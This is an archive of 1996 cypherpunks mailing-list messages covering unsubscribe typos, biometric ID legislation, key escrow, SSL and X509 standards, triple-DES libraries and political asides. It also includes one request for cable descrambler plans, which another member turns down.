>unsubbscribe
>
>The penalty for not paying attention being continued receipt of 50 mail
>messages a day!
>

Well, at least this one is *vaguely* forgiveable - the 'b' and 'v' keys
*are* next to each other on a keyboard....

Dave Merriman
-------------------------------------------------------------
"Giving money and power to government is like giving 
whiskey and car keys to teenage boys."
                    P. J. O'Rourke (b. 1947), U.S. journalist.
<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
http://www.shellback.com/personal/merriman/index.htm






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tbyfield@panix.com (t byfield)
Date: Thu, 28 Mar 1996 20:14:44 +0800
To: cypherpunks@toad.com
Subject: Re: unsubscrive
Message-ID: <v02140b03ad7fd9666b21@DialupEudora>
MIME-Version: 1.0
Content-Type: text/plain


8:28 PM 3/27/96, Timothy C. May:

> The penalty for not paying attention being continued receipt of 50 mail
> messages a day!

        And either a practical reason for the many to learn English or for
programmers to watch how English melts in the mouths of people not fluent
in it: "describe" and "unsubscrive" being pretty predictable Latinate
mutations.

Ted






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: firebrd123@ns.interconnect.net (Dan Nikolai)
Date: Thu, 28 Mar 1996 21:14:42 +0800
To: cypherpunks@toad.com
Subject: PPV Descrambler
Message-ID: <3159ECA9.746F@mail.interconnect.net>
MIME-Version: 1.0
Content-Type: text/plain


I've been looking for a file on how to make PPV descramblers and havn't 
found any. Commercial descramblers cost around $200 base price. If 
anyone has a file on how to make them please e-mail me one.  Thanks.

captain_lee @mail.interconnect.net




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Tim May)
Date: Thu, 28 Mar 1996 21:42:17 +0800
To: cypherpunks@toad.com
Subject: The Law Loft: Surviving the Biometric I.D. Card
Message-ID: <199603280946.BAA08787@you.got.net>
MIME-Version: 1.0
Content-Type: text/plain



Though some will petulantly claim that this has "nothing to do with
crypto," I think the report on legislation which may lead to new levels of
national identification is very apropos to the themes of this list. A
national ID card could be tied in to the CDA and other such legislation:
the "Internet Driver's License" we are worried about. This would also
facilitate the criminalization of anonymous remailers.

(I noticed at a local night spot large posters announcing the city's "Zero
Tolerance" policy for passing a drink to a minor. Imagine the same folks
passing laws about the criminalization of giving access to a minor....)

Here's the forwarded article: 



> Path:
we.got.net!news.oz.net!newshub.internex.net!news.Stanford.EDU!agate!overload.lbl.gov!news.kreonet.re.kr!news.dacom.co.kr!nntp.coast.net!news.kei.com!news.texas.net!usenet
> From: klynch@intrepid.net
> Newsgroups: misc.survivalism
> Subject: The Law Loft: Surviving the Biometric I.D. Card
> Date: Thu, 21 Mar 1996 09:34:25 GMT
> Organization: Texas Networking, Inc.
> Lines: 148
> Message-ID: <4ir7hj$391@nntp.texas.net>
> NNTP-Posting-Host: klynch.intrepid.net
> X-Newsreader: Forte Free Agent 1.0.82
> 
> --------------------------------
> Here is the latest Alert from The Law Loft.  Sorry its
> late.
> 
> If you are benifitting by this information, please don't just
> keep it to yourself - share it with someone immediately.  And
> perhaps you can Fax Suzanne and Pete a thank you and ask
> them what you can do to help.
> 
> This work is pretty lonely and grinding.  And oh so few ever thank 
> you for it. Of course that's not why their doing it.
> 
> Many of you could do the same thing I'm doing.  You can listen to
> 7.435 MHz at 8:00 pm EST and take notes from The Law Loft.  You
> can FAX them a request to send you information.  You can then pass 
> it on to others.
> 
> When you don't see anything from me out here, you can pitch in and do
> it.  This is late, because I had no other choice but to catch an early
> train.
> 
> Throw away the "boob" tube and stop wasting your precious little time
> that we have left to learn and work together.  Invest in a good
> Short-Wave radio with a built in tape machine.  I use the Radio Shack
> DX-392 portable receiver.  NO LICENSE REQUIRED TO LISTEN.
> 
> Check out other fine alternative news programs on 5.065 between 6:00
> pm EST and 12:00 midnight week nights.
> 
> Please help us - do your little part.
> 
> For Freedom,
> Kerry
> http://www.intrepid.net/~klynch/uslaws.html
> ---------------------------------------------
> H.R. 2202 Immigration Bill
> 
> Special Alert II
> 
> March 19, 1996  [Please note this date when reading - Kerry] * * * * *
> * * *
> 
> H. RES. 384 bringing H.R. 2202 and 17 proposed amendments to the floor
> passed today in the House.  Debate on the bill and amendments
> continues tomorrow. Vote on amendment number 4 is expected tomorrow:
> 
>         The picture in the House of Representatives grows darker.  H.R. 384
> bringing H.R. 2202, the Immigration bill, to the floor for a vote
> along with 17 proposed amendments passed easily by wide majority in
> today's session.
> 
>         Work on amendments including Congressman McCullum's amendment no. 4
> will start up again tomorrow.  We estimate that the vote on amendment
> number 4 will occur about 3:00 pm EST.
> 
> Both the House and Senate bills are intended to bring us some form of
> universal biometric identifier i.d. card either in the form of a new
> social security card or a passport linked to biometric identifier
> birth certificates and drivers' licenses:
> 
>         The House bill, H.R. 2202, if passed will bring in the biometric
> identifier slowly with greater subtlty than the Senate version.  The
> biometric identifier is clearly in the picture here.  Here's why:
> 
>         1) The report of the U.S. Commission on Immigration entitled U.S.
> Immigration Policy: Restoring Credibility talks openly about the use
> of biometric identifiers for driver's licenses on page 65.  Key
> language throughout the report dealing with fraudulent use of
> identifying documents also leads to only one place - introduction of
> the biometric identifier form of identification.
> 
>         2) The NarcOfficer, official publication of international narcotics
> enforcement officer association in its September/October 1995 issues
> states point blank that a universal biometric identifier system is
> intended for use by everyone on the planet.
> 
>         3) The Senate bill formerly S. (unumbered) now split into S. 269 and
> S. 1361 in sections 111-116 talks about birth certificates with
> 'fingerprint or other biometric data'.  The same section talks about
> new driver's licenses with 'fingerprint or other item of biometric
> data'.
> 
>         4) The Hoke Amendment to H.R. 2202 added by the House Judiciary
> Committee talks about a 'demonstration pilot project with a reliable,
> easy to use, confirmation mechanism'.
> 
> 
>         5) The McCullum amendment, no.4 on the calendar of amendments to H.R.
> 2202 talks about creating an official document that 'offers the best
> possible security against counterfeiting, forgery, alteration, and
> misuse'.  And provides for creating a new social security card that
> would be 'as secure against fraudulent use as United States passport'.
> Part of the catch here is which version of the passport?  The Senate
> bill provides for the creation of anew fraud resistant passport.
> 
>         The McCullum amendment would make the new technology binding on all
> social security cards issued after January 1, 1999.  Beginning on
> January 1, 2006, all employers would be required to verify employment
> eligibility with the new social security card.
> 
> Any way you cut it, this is too much authority to invest in any
> government!
> 
>         Our founding fathers knew that only way to be free and remain free is
> to constrain the power of the government.  As John Dickinson said in
> 1768 in Letters from a Farmer in Pennsylvania: "For who are a free
> people?  Not those, over whom government is reasonably and equitably
> exercised, but those, who live under a government so constitutionally
> checked and controlled that proper provision is made against it being
> otherwise exercised".
> 
>         Creation of a mandatory, universal biometric identifier identification
> system lets the genie out of the bottle.  It would gut the 4th
> Amendment's right of provacy and let the government surveil and
> control us instead of vice versa.
> 
> What to do now:
> 
>         We need at least 100,000 phone calls and faxes in Washington by
> tomorrow.  We may not win in the House but we have to try.  Remember
> if we build up steam now in the House our chances will be better later
> in the Senate.
> 
>         Contact your congressman tonight by fax (best) or tomorroww by phone
> (good).  Argue with him, politely.  He might think that just because
> amendment 4 says it won't be used as a universal identifier, that
> amendment 4 and the bill are okay.  Remind him what happened to the
> social security card.  It was supposed to be voluntary too in the
> beginning.  
> 
>         As time permits, contact as many congressmen as you can in California,
> New Mexico, Arizona, Florida, and Illinois.  These congressmen are
> going to be under especially heavy pressure to pass the bill no matter
> what it says.  You can use the toll-free numbers for your call: (800)
> 962-3524, (800) 972-3524, or (800) 872-8513.
> 
> Tell them we want to keep the 4th Amendment to the Constitution and
> the only way to do that is to kill the 4th amendment to the bill.
> Tell them that we are not at all amused by the hidden joke of using an
> amendment 4 to kill the 4th Amendment to our Constitution.  No, no, no
> to any version of the biometric identifier!  Vote no to H.R. 2202!
> 
> Suzanne Harris
> The Law Loft
> Los Angelos, CA
> (818)-305-7613
> 7.435 MHz (Short-Wave) 8:00 pm EST Week nights.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tbyfield@panix.com (t byfield)
Date: Thu, 28 Mar 1996 20:42:15 +0800
To: cypherpunks@toad.com
Subject: [NOISE] crypto in the Racing Form
Message-ID: <v02140b04ad7fe3b8d7df@DialupEudora>
MIME-Version: 1.0
Content-Type: text/plain


Vaguely apropos the "let's not raise their awareness" thread, a few weeks
back I noticed in the Racing Form a full-page ad for a horse named
"Cryptoclearance." It raced well enough, but its owners getting a lot more
mileage out of studding it--"the 13th leading sire." Its offspring:
Cryptogram, Code of Love, Crypto Lady, Denied Access, Cryptodynamite,
and--I can't tell if my scrawl deceives me--Cryptomay. (If it does, my
apologies.)
        So those who're arguing for keeping a low profile crypto-wise had
better hope that these horses are losers and that its other offspring
(Denied Access, Final Clearance, Pinpoint Control, Mt. Bueran, Clearance
Code) are winners. If there's another Seabiscuit or Secratariat in that
Crypto- lineage (which is pretty doubtful)...

Ted






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 29 Mar 1996 12:00:01 +0800
To: cypherpunks@toad.com
Subject: Re: Why Americans feel no compulsion to learn foreign languages
Message-ID: <ad7f8eef2c0210048790@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 9:05 PM 3/27/96, Rich Graves wrote:

>Undeniably true. I think Tim's point was more, "Who cares?  Everyone *I*
>want to talk to speaks English."
>
>One may quibble with the wisdom or morality of such a statement, but if
>the second statement is true in your case, then there is no reason you
>should have to learn another language. Most upper-income Americans have no
>need for esoteric languages. Almost all upper-income Americans have a need
>for English.

Yes, this is mostly my point. And it is not just me I'm talking about--I
don't see a compelling need for 95% of Americans to learn a second
language...in fact, I'd rather they learned to speak and read English
properly.

(All of the America-bashers who were chiming in earlier today with their
anti-American jokes...well, here's one for you: "What do you call someone
who knows how to speak and write English properly? A European.")

I don't deny that Alan Bostick needs to take a class in Yoruba so he can
communicate with his neighbor, nor do I deny Michael Helm's point that by
not studying Talegu we are denying ourselves access to the world's culture.
In my next 25 lifetimes, with the advent of Nanocryonic Revitalization, I
certainly will try to learn several of these obscure languages.

Father Guido Sarducci has a nice routine in which he describes what happens
to our high school Spanish in the several years after taking it. After the
fourth or fifth year, all we remember is "Como esta?" (I took German, not
Spanish, so my spelling is phonetic, from his dialog.) The point being that
very few Americans have any _continuing_ way to use the languages we learn.
Which is a major reason they are being dropped by many schools.

Even in areas with lots of Mexicans and other Latinos, few opportunities.
(Your mileage may vary, but I think this is generally so.) My sister lives
near Miami and finds no need to brush up on her Spanish. The educated
Cubans and ohter Latinos all speak English fluently, and the uneducated
Mexicans and the like she has no need to communicate with.

(No doubt some of the politically correct will once again denounce me as a
racist. This is not racism, just reality. And to some, the truth hurts.)

There is an "information theory" interpretation of learning foreign
languages. Where I live, the issue is not that there are not native
speakers of foreign languages...the issue is that no single foreign
language stands out as being desirable to learn, except for one's personal
edification or circumstances. So what languages should schools offer?
French and German are not common in California, or the U.S. in general, and
the languages of the immigrant communities (Spanish, Vietnamese, Tagalog,
Laotian, Korean, etc.) have little use except in communicating with these
communities. And they are all busy learning English....

--Tim May


Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 28 Mar 1996 22:00:35 +0800
To: cypherpunks@toad.com
Subject: Re: Why Americans feel no compulsion to learn foreign languages
Message-ID: <ad7f931e2d021004830b@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 12:41 AM 3/28/96, Charles Bell wrote:
>On Wed, 27 Mar 1996, Timothy C. May wrote:
>>
>> There is not a single foreign language I can think of it that would help me
>> in my goals or help anyone I know. This is the reality of a world dominated
>> by English-speaking persons and in which all technical people learn
>> English.
>>
>
>I guess you don't know anyone who expects to do extensive business in
>China during the 21st Century.

Unpersuasive. And school systems are unpersuaded as well, as very few offer
classes in Mandarin. A notoriously difficult language to learn, especially
to write. (A friend of mine spent 8 years learning Japanese, a somewhat
similar language, and made only moderate progress.)

The "needed for business" is what sparked the mini-boomlet in Russian
classes in the 70s, then the larger boomlet in Japanese classes in the 80s.
Most of these lessons were wasted. In any case, the issue is not the
classes taken by _some_ (the few percent who study Russian, Japanese,
Mandarin, etc.), but the topic of this thread: "Why Americans feel no
compulsion to learn foreign languages."

Or do you think Mandarin should be taken by high school and college
students so they can do business in China?

Reality Check: I know the folks moving to the PRC to set up Intel's
operations there. They are native speakers of Mandarin, of which there are
already a vast number in U.S. electronics companies. The notion that Suzi
T. Nelson should take Mandarin in high school to help prepare for the 21st
century is absurd, and any guidance counselor who so advises her should be
fired forthwith.

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 29 Mar 1996 11:59:17 +0800
To: cypherpunks@toad.com
Subject: Re: unsubscrive
Message-ID: <ad7f96a02f0210045624@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:20 PM 3/27/96, David K. Merriman wrote:

>Well, at least this one is *vaguely* forgiveable - the 'b' and 'v' keys
>*are* next to each other on a keyboard....

A nice theory, but he uses the misspelling in the thread title
("unsubscrive") and in his body message of "unsubscrive cypherpunks." If he
mistyped, it happened twice in the same way.

(And I try to always check my spelling carefully when I am sending commands
to a majordomo-type automatic processor!)

"Measure twice, cut once."

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Chevelle <love5683@voicenet.com>
Date: Thu, 28 Mar 1996 21:40:09 +0800
To: jimbell@pacifier.com>
Subject: Re: National speed limits and expansion of federal power...
Message-ID: <199603280812.DAA06739@mail.voicenet.com>
MIME-Version: 1.0
Content-Type: text/plain


It was only months ago that they passed a bill raising alot of speed limits
to the 75mph range.

                                Chevelle
At 06:06 PM 3/27/96 -0500, Deven T. Corzine wrote:
>At 11:47 PM 3/26/96, Jim Bell wrote:
>>They just recently repealed the national 55 MPH speed limit.  Even though it
>>was repealed by law, in the same way it was passed, plenty of people have
>>argued that the Federal government has no jurisdiction in this area.  Those
>>arguments are absolutely valid, even if they were ignored.  The danger in
>>giving the government implicit authority in areas not mentioned in the
>>Constitution is that it is not clear how far such justification extends.
>
>Actually, the national government didn't even *pretend* it had jurisdiction
>here.  Instead, they used an indirect approach -- they passed laws which
>denied some of the existing highway funding to states with higher speed
>limits than 55 MPH.  (Later this limit was raised to 65 MPH, given some
>additional restrictions such as proximity to population centers.)
>
>Any and all states were perfectly free (in theory) to ignore this "national
>speed limit" and set any limit or no limit at all.  In practice, no states
>exercised this hypothetical freedom, because they had already grown dependent
>on highway funds provided by the national government.  Thus, through indirect
>pressure exerted through the funding mechanisms, the national government was
>able to usurp perogatives which were clearly in the domain of the states.
>
>The national government has expanded greatly in size and powers in times of
>war and national crisis.  In particular, FDR spearheaded the massive growth
>of the national government in response to the Great Depression, and it has
>continued to grow ever since.  More and more often, the national government
>usurps traditional state's roles, even in situations of unquestionable state
>jurisdiction such as national speed limits.  The elastic clause was one key
>tool used for this expansion.
>
>Another key tool is the commerce clause, which has been seriously abused to
>secure new powers for the national government.  I don't think I'll go into it
>right now...
>
>>If the government can limit us to 55, then why can't they limit us to 40-bit
>>keys?
>
>The national government didn't impose 55 MPH speed limits on us, the states
>did it under national pressure.  As for whether they can legitimately limit
>cryptography use and technology, we don't have any clear answer yet, in any
>legal precedent.  Of course, most of us hold the opinion that cryptography
>should be considered Constitutionally protected as free speech, but politics
>get involved when these things get decided...
>
>Deven
>
>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Charles Bell <quester@eskimo.com>
Date: Sat, 30 Mar 1996 19:34:17 +0800
To: Phil Karlton <karlton@netscape.com>
Subject: Re: Edited Edupage, 24 March 1996
In-Reply-To: <3159926C.FF6@netscape.com>
Message-ID: <Pine.SUN.3.92.960328084430.2359C-100000@eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 27 Mar 1996, Phil Karlton wrote:

> Perry E. Metzger wrote:
> --
> Philip L. Karlton		karlton@netscape.com
> Principal Curmudgeon		http://home.netscape.com/people/karlton

It's clear we have a good match here.

Charles Bell






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Young <eay@mincom.oz.au>
Date: Thu, 28 Mar 1996 18:27:23 +0800
To: Bill Stewart <stewarts@ix.netcom.com>
Subject: Re: About Triple DES ......
In-Reply-To: <199603270836.AAA20254@dfw-ix12.ix.netcom.com>
Message-ID: <Pine.SOL.3.91.960328092155.6081E-100000@orb>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 27 Mar 1996, Bill Stewart wrote:
> That part's easy - DES source is available on ftp.ox.ac.uk, and also on
> ftp.dsi.unimi.it and ftp.funet.fi.  There may be specific triple-DES 
> code there, but if not, triple DES is just
>         Encrypt(Key1, Decrypt(Key2, Encrypt(Key3, Message)))
> so you can easily write a subroutine to do that.

I got carried away with adding triple DES to libdes v 3.21+ (listed at
most of the above mentioned sites) back in november.  It has routines for
triple DES in ecb, cbc, cfb64 and ofb64 modes.

The SSLeay package builds a utility called 'enc' which can 
encrypt/decrypt with optional base64 conversion in any of the above 
mentioned modes (plus more).  Infact, SSLeay has much nicer higher level 
'by parts' finctions for the ciphers that are much easier to use.

eric
--
Eric Young                  | Signature removed since it was generating
AARNet: eay@mincom.oz.au    | more followups than the message contents :-)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Declan O'Donovan/ITP/IE" <Declan_O'Donovan/ITP/IE.ITP@bonzo.itp.ie>
Date: Sun, 31 Mar 1996 01:39:03 +0800
To: cypherpunks <cypherpunks@toad.com>
Subject: unsuscribe
Message-ID: <9603301832.AA0134@bonzo.itp.ie>
MIME-Version: 1.0
Content-Type: text/plain


unsuscribe





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Fri, 29 Mar 1996 08:42:30 +0800
To: Duncan Frissell <frissell@panix.com>
Subject: Re: So, what crypto legislation (if any) is necessary?
In-Reply-To: <2.2.32.19960326112653.00c3850c@panix.com>
Message-ID: <Pine.SUN.3.91.960328154258.1406D-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 26 Mar 1996, Duncan Frissell wrote:

> At 09:46 PM 3/25/96 -0500, Michael Froomkin wrote:
> 
> >An interesting issue, likely to be addressed in future judicial 
> >assistence treaties...
> >
> 
> However, future judicial assistance treaties are meaningless if you store
> your keys anonymously (domestically or internationally) so that even the
> keeper doesn't know he has them or exactly where they are in his pile of keys.

Given the significant contempt charges that can follow a refusal to 
produce items (anonymous or not) this still depends on the absence of 
initial detection.

> In general, I think that we should attack government key escrow on economic
> efficiency grounds by pointing out that it is unlikely that "socialized key
> escrow" would do as good a job as private enterprise key escrow.  The
> Stalinist method of industrial production, is well known for its
> inefficiencies and similar inefficiencies attach to government key escrow.

Here I agree.

> In fact, I suppose that government operation of the identification system
> (drivers' licenses, passports, etc.) in general is also horribly inefficient
> and should be attacked on efficiency grounds.

You might not like what you get in response.  Streamlined and uniform 
identity documents generated at birth and renewed with tax filings would 
be the likeliest efficiency improvement.  An inefficient government 
identification system is to the advantage of the privacy seeker.

> 
> DCF
> 

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Michael E. Carboy" <carboy@hooked.net>
Date: Fri, 29 Mar 1996 22:21:48 +0800
To: cypherpunks@toad.com
Subject: NOISE: Scriveners Attack C-Punks
Message-ID: <199603290008.QAA11067@get.hooked.net>
MIME-Version: 1.0
Content-Type: text/plain


Watch out folks... the scriveners are after us!  No doubt in cahoots with teh exonites!


----------
From: 	Nibiru[SMTP:nibiru@columbus.co.za]
Sent: 	Monday, February 26, 1996 1:32 AM
To: 	cypherpunks@toad.com
Subject: 	unsubscrive

unsubscrive cypherpunks


-------------------------------------------------------------------
NIBIRU                                  
E-Mail : nibiru@columbus.co.za
South-Africa                                                          
--------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Young <eay@mincom.oz.au>
Date: Thu, 28 Mar 1996 21:53:54 +0800
To: Phil Karlton <karlton@netscape.com>
Subject: Re: Edited Edupage, 24 March 1996
In-Reply-To: <3159926C.FF6@netscape.com>
Message-ID: <Pine.SOL.3.91.960328154547.17117D-100000@orb>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 27 Mar 1996, Phil Karlton wrote:
> Perry E. Metzger wrote:
> > We aren't talking about SSL, Mr. Karlton.
> My apologies for misunderstanding what you wrote. It could be that I am
> oversensitive on the issue since SSL has been "accused" of being
> proprietary in many forums.

Just a quick comment on the openness of SSL.  I have been able to 
implement SSL and support routines from internet available documentation.
There is only one part that I have had trouble getting documentation 
for.  This one part is a 'standard' but the only way I can get it is by 
either spending lots of money or by getting other people to send me their 
own online information.
I'm talking about X509/ASN.1.  I still am not sure of the format of the 
ASN.1 BOOLEAN type, and I have only just been able to get hold of the 
actual full specification of X509v3.  The UNIVERSALSTRING type?  Only 
found out about it's existance 3 days ago.

Netscape has not been in anyway an impediment to implementing SSL.
RSA inc and it's software patents are more of an issue.  Mind you, I 
would not have gotten off the ground if it was not for RSA's PKCS 
documents.  As some-one who started implementing SSL as a learning 
exercise with no money to spend, I have learnt to dislike the way some 
the 'standards' are not available (by which I mean available for 
the masses via the internet, ala rfc's).

eric (venting some frustration that build up during the just completed
      'quest for the X509v3 spec')
--
Eric Young                  | Signature removed since it was generating
AARNet: eay@mincom.oz.au    | more followups than the message contents :-)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: elran@pl.jaring.my
Date: Thu, 28 Mar 1996 22:26:45 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199603280921.RAA04560@relay2.jaring.my>
MIME-Version: 1.0
Content-Type: text/plain


undescribe cypherpunks@toad.com elran@pl.jaring.my




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Fri, 29 Mar 1996 23:14:09 +0800
To: Black Unicorn <frissell@panix.com>
Subject: Re: So, what crypto legislation (if any) is necessary?
Message-ID: <m0u2SwS-0008y1C@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 03:46 PM 3/28/96 -0500, Black Unicorn wrote:
>On Tue, 26 Mar 1996, Duncan Frissell wrote:
>
>> At 09:46 PM 3/25/96 -0500, Michael Froomkin wrote:
>> 
>> >An interesting issue, likely to be addressed in future judicial 
>> >assistence treaties...
>> >
>> 
>> However, future judicial assistance treaties are meaningless if you store
>> your keys anonymously (domestically or internationally) so that even the
>> keeper doesn't know he has them or exactly where they are in his pile of 
keys.
>
>Given the significant contempt charges that can follow a refusal to 
>produce items (anonymous or not) this still depends on the absence of 
>initial detection.

You clearly don't understand.  You're making the ASSumption that the 
organization keeping the keys can produce them in a form that is "useful" to 
the cops.  Escrowing encrypted keys makes them useless to subpoena, and in 
fact it helps the key owner because the escrow agent can (and, in fact, 
must!) be obligated to inform the key owner if his key is requested.

You also seem to assume that "contempt charges" will be able to operate 
world-wide, which is a highly dubious proposition.  (Read Froomkin's 
paragraph above CAREFULLY.  He said "internationally.")  

And in any case, I consider it highly doubtful that anybody would contract 
with an escrow agent and identify himself by name.  It would be a simple 
matter to operate "escrow agents," just glorified data-holders, who would 
receive data anonymously and send it out just as anonymously, to the person 
who can identify themselves via some sort of encrypted ID system.   Even 
"detecting" such a transfer is useless because the cops won't be able to 
figure out what the data is, since it's encrypted in both directions while 
being transferred, in addition to being encrypted while being held, with a 
code the escrow agent doesn't know.


In short, you need to comprehend what you're responding to before you 
express your opinions.  You're living down to my expectations.


>> In fact, I suppose that government operation of the identification system
>> (drivers' licenses, passports, etc.) in general is also horribly inefficient
>> and should be attacked on efficiency grounds.
>
>You might not like what you get in response.  Streamlined and uniform 
>identity documents generated at birth and renewed with tax filings would 
>be the likeliest efficiency improvement.  An inefficient government 
>identification system is to the advantage of the privacy seeker.

You seem to be ASSuming that an "efficient identification system" is one 
that will ALSO operate to the benefit of the government, as opposed to the 
individual who wants to be identified for only limited purposes.  I don't 
think so.  Chaum's encrypted ID system described in the August 1992 
Scientific American makes it clear that identification can occur without the 
ability to cross-reference databases.  Chaum's system, if implemented with 
current microprocessor technology, would be extremely "efficient," at least 
from the standpoint of the amount of human effort involved.  It would, 
however, be extremely hostile to the government.

Jim Bell
jimbell@pacifier.com







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Fri, 29 Mar 1996 16:20:29 +0800
To: "Declan B. McCullagh" <cypherpunks@toad.com
Subject: Re: New crypto bill to be introduced
Message-ID: <m0u2TSC-0008zmC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 06:03 PM 3/28/96 -0500, Declan B. McCullagh wrote:
>At CFP today, we heard about a new crypto bill being introduced
>tomorrow, which will be similar to Leahy's bill with the
>crypto-being-used-in-furtherance-of-crime portion removed and an
>explicit no-government-mandated-escrow provision added.

While this does sound like progress, I'm suspicious.   Peter Junger's 
analysis raised serious doubt as to the ability of bill to open up the 
crypto export market as it purported to.  

And where, exactly, did this these changes come from?  Who was consulted?  
What recommendations were NOT taken?


>We have put our "List of Shame" numbers on our nametags.
>-Declan

You're overdoing it on this "List of Shame" thing.  You don't know 
who actually made those anonymous postings, and it's been observed that 
those names seem to correspond nicely with an NSA-hate list.  It would not 
take a great deal of imagination to conclude that the NSA was motivated to 
de-focus our anger at the Leahy bill and replace it with a great deal of 
back-stabbing commentary.  (If that was the intent, it succeeded...)

On the other hand, I've also noticed that there hasn't been a lot of 
specific analysis of the Leahy bill in the last few weeks, and my suggestion 
that the Leahy bill be informally re-written to address Junger's objections 
(as well as my own, and Tim May's, etc) has not resulted in a great deal of 
repair work.  Now, miraculously, a replacement bill appears that includes 
SOME repairs.  (obviously, we have to wait to hear how most of it comes out...)

I get the impression that we are being sequentially offered ice cream cones 
with decreasing amounts of poison in them, in the hopes that at some point 
we'll bite.  It seems to me that whoever is writing these bills should be 
willing to make a statement about what his goals are, and who he's talking 
to as he crafts them, and what changes he was UNwilling to include.

Jim Bell
jimbell@pacifier.com 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Deven T. Corzine" <deven@ties.org>
Date: Fri, 29 Mar 1996 17:40:41 +0800
To: Chevelle <love5683@voicenet.com>
Subject: Re: National speed limits and expansion of federal power...
In-Reply-To: <199603280812.DAA06739@mail.voicenet.com>
Message-ID: <199603282352.SAA14137@escher.ties.org>
MIME-Version: 1.0
Content-Type: text/plain


At 06:06 PM 3/27/96 -0500, Deven T. Corzine wrote:
>Actually, the national government didn't even *pretend* it had jurisdiction
>here.  Instead, they used an indirect approach -- they passed laws which
>denied some of the existing highway funding to states with higher speed
>limits than 55 MPH.  (Later this limit was raised to 65 MPH, given some
>additional restrictions such as proximity to population centers.)

At 03:12 AM 3/28/96 -0500, Chevelle wrote:
>It was only months ago that they passed a bill raising alot of speed limits
>to the 75mph range.

To be precise, Congress repealed the laws which had pressured states into the
55/65 MPH speed limits.  Once this happened, a number of states either took
advantage of it immediately to raise speed limits, or are considering it...
Other states don't intend to raise the limits.  In Montana, you can now drive
at *any* speed legally, in the daytime.  So if you want to go 100 MPH, head to
Montana...  :-)

Deven




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: firebrd123@ns.interconnect.net (Dan Nikolai)
Date: Fri, 29 Mar 1996 18:12:36 +0800
To: cypherpunks@toad.com
Subject: Re: PPV Descrambler
In-Reply-To: <2.2.32.19960328050605.00698058@arn.net>
Message-ID: <315AE567.7405@mail.interconnect.net>
MIME-Version: 1.0
Content-Type: text/plain


David K. Merriman wrote:
> 
> At 01:34 AM 03/28/96 +0000, you wrote:
> >I've been looking for a file on how to make PPV descramblers and havn't
> >found any. Commercial descramblers cost around $200 base price. If
> >anyone has a file on how to make them please e-mail me one.  Thanks.
> >
> >captain_lee @mail.interconnect.net
> >
> 
> This is cypherpunks. Not Cable-TV-Piracy-Punks.
> 
> Dave Merriman
> -------------------------------------------------------------
> "Giving money and power to government is like giving
> whiskey and car keys to teenage boys."
>                     P. J. O'Rourke (b. 1947), U.S. journalist.
> <><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
> http://www.shellback.com/personal/merriman/index.htm


